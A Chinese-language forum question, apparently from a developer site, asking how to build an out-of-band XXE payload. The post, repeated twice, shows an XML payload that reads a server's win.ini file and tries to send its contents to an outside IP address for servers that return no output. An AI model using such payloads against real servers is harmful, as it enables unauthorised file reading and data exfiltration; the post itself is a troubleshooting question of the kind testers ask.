8,906
社区成员
发帖
与我相关
我的任务
分享XML如何将变量的值拼接到属性中去
大佬们,如何在XML中拼接将属性与变量拼接起来呢?
我的XXE payload 是这样的:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY % ab SYSTEM "file:///c://windows//win.ini">
<!ENTITY xxe SYSTEM "http://123.56.01.01/1.php?id=%ab;">]>
<a>&xxe;</a>
这里我利用漏洞去读取服务器的win.ini文件,但是在日常工作中,有的服务器因为安全配置关闭了命令回显,这个时候就不能获取到读的win.ini文件。
希望大佬们给我解答下,非常感谢!!!
我的XXE payload 是这样的:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY % ab SYSTEM "file:///c://windows//win.ini">
<!ENTITY xxe SYSTEM "http://123.56.01.01/1.php?id=%ab;">]>
<a>&xxe;</a>
这里我利用漏洞去读取服务器的win.ini文件,但是在日常工作中,有的服务器因为安全配置关闭了命令回显,这个时候就不能获取到读的win.ini文件。
希望大佬们给我解答下,非常感谢!!!
...全文
请发表友善的回复…
发表回复
